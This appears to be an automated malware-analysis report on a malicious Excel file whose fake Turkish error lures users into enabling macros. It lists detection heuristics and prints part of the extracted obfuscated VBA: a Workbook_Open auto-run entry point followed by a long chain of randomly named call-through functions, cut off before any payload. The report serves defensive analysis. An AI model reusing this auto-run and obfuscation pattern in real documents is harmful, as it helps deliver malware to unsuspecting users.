Malware Insights
The sample is an Excel document containing VBA macros, specifically a Workbook_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary code. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic for malicious documents. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature. The VBA script's obfuscated nature and the use of Shell() suggest it likely downloads and executes a second-stage payload.
Heuristics 5
-
ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16830 bytes |
SHA-256: 1c5aec867a7b504302aa71d7c9a46dc2d10ec59146c6e373789133486ac64068 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VA"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AV"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub worKBook_opeN(): Call JrsAR: End Sub
Static Function JrsAR() As Currency
Call peJit
End Function
Sub peJit()
Call jnkhz
End Sub
Sub jnkhz()
Call ewKfF
End Sub
Function ewKfF() As Boolean
Call KjbNg
End Function
Function KjbNg() As String
Call EsCMm
End Function
Function EsCMm()
Call lfTuO
End Function
Function lfTuO() As Date
Call foutT
End Function
Static Function foutT() As String
Call ZwUrZ
End Function
Sub ZwUrZ()
Call GklZB
End Sub
Sub GklZB()
Call AsMYG
End Sub
Function AsMYG() As Currency
Call ggdGi
End Function
Static Function ggdGi() As Integer
Call aoEFo
End Function
Function aoEFo() As Single
Call VxeDt
End Function
Sub VxeDt()
Call dbNSd
End Sub
Function dbNSd() As Byte
Call XjoQj
End Function
Static Function XjoQj() As Variant
Call DXFzK
End Function
Static Sub DXFzK()
Call yffxQ
End Sub
Sub yffxQ()
Call soGwW
End Sub
Static Sub soGwW()
Call YbXex
End Sub
Static Sub YbXex()
Call SkycD
End Sub
Function SkycD() As Boolean
Call zXPKf
End Function
Function zXPKf() As Double
Call tgqJk
End Function
Static Function tgqJk()
Call aTHrM
End Function
Static Sub aTHrM()
Call UchqS
End Sub
Sub UchqS()
Call OkIoX
End Sub
Static Sub OkIoX()
Call uYZWz
End Sub
Static Function uYZWz() As Date
Call phAVF
End Function
Function phAVF() As Currency
Call VURDh
End Function
Function VURDh() As String
Call PdrBm
End Function
Static Function PdrBm() As Date
Call KlSAs
End Function
Static Sub KlSAs()
Call qZjiU
End Sub
Sub qZjiU()
Call khKhZ
End Sub
Static Sub khKhZ()
Call RVbPB
End Sub
Static Sub RVbPB()
Call nTTuO
End Sub
Static Sub nTTuO()
Call hcutU
End Sub
Static Function hcutU() As Double
Call NQLbw
End Function
Private Function NQLbw() As Object
Call HYlZB
End Function
Static Function HYlZB() As Boolean
Call oMDHd
End Function
Static Sub oMDHd()
Call iUdGj
End Sub
Private Sub iUdGj()
Call cdEEo
End Sub
Static Sub cdEEo()
Call JQVnQ
End Sub
Static Sub JQVnQ()
Call DZvlW
End Sub
Static Function DZvlW() As Variant
Call jMNTy
End Function
Private Function jMNTy() As Date
Call eVnSD
End Function
Static Function eVnSD() As Currency
Call YdOQJ
End Function
Static Sub YdOQJ()
Call ERfyl
End Sub
Static Sub ERfyl()
Call zZFxq
End Sub
Static Sub zZFxq()
Call fNXfS
End Sub
Static Function fNXfS() As String
Call ZVxeY
End Function
Static Function ZVxeY()
Call TeYcd
End Function
Private Function TeYcd() As Byte
Call ASpKF
End Function
Static Function ASpKF() As String
Call wQInz
End Function
Private Sub wQInz()
Call cEZWa
End Sub
Static Sub cEZWa()
Call WMAUg
End Sub
Private Sub WMAUg()
Call DARCI
End Sub
Private Function DARCI() As Object
Call xIsBN
End Function
Static Function xIsBN() As Boolean
Call rRSzT
End Function
Private Function rRSzT() As String
Call YEkiv
End Function
Private Sub YEkiv()
Call SNKgA
End Sub
Private Sub SNKgA()
Call yAbOc
End Sub
Static Function yAbOc() As Double
Call tJCNi
End Function
Private Function tJCNi()
Call nRcLn
End Function
Private Function nRcLn() As Date
Call TFutP
End Function
Static Function TFutP() As Currency
Call ONUsV
End Function
Private Function ONUsV()
Call uBlax
End Function
Private Sub uBlax()
Call oKMZC
End Sub
Private Sub oKMZC()
Call KIEEQ
End Sub
Private Sub KIEEQ()
Call rwVmr
End Sub
Sub rwVmr()
Call lEwkx
End Sub
Private Sub lEwkx()
Call RsNTZ
End Sub
Private Function Rs
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.